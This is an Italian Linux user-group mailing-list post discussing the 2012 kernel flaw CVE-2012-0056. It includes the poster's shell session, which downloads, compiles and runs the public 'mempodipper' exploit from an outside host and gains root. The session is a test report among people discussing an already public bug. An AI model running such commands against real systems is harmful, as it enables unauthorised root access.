[Linux-Biella] Vulnerabilità kernel >= 2.6.39 (SUID /proc/pid/mem)

Daniele Segato daniele.bilug a gmail.com
Mar 31 Gen 2012 13:40:09 CET


On 01/31/2012 01:30 PM, Federico "Darkmagister" Pietta wrote:
>> urca
>> pesante il bug...
>>
>
> concordo, saranno contenti quelli con ICS così non devo installare
> programmi strani per rootare :D comunque per fortuna che debian stable
> sta ancora con il 2.6.32, ecco cosa vuol dire :D

si...
ma sai la  marea di distribuzioni in giro con il bug?

l'ho provato....

$ whoami
mastro
$ cd /tmp
$ wget 'http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c'
$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x4020b8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/19469/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x4020ac.
[+] Executing su with shellcode.
# whoami
root

O_O doh!

$ uname -a
Linux mastroc3 3.1.0-1-amd64 #1 SMP Tue Jan 10 05:01:58 UTC 2012 x86_64 
GNU/Linux

debian testing

>> ed è rimasto in giro per un bel po' di versioni :S
>>
>
> qua sul 3.2.0 c'è ancora... :D
>
> c'è però da dire che le ultime versione sono uscite in pochi mesi,
> rilasci abbastanza veloci e poco incentrati su lato sicurezza ma più
> compatibilità (non è assolutamente una giustificazione)


no questo è davvero un brutto bug



> il 2.6.39 è uscito circa il 19/05/2011 quindi direi che è un lungo tempo
> comunque, qui vince la strategia debian però :D

ni :)
vince sul piano sicurezza
e comunque se nessuno si accorgeva oggi ma saltava fuori fra qualche 
mese se lo beccava anche la debian stable

> ma perchè ti rispondi da solo alle email ? :D

perché ho scritto in ml prima di leggermi tutto l'articolo e finito 
l'articolo volevo condividere la mia perplessità :)


Maggiori informazioni sulla lista Linux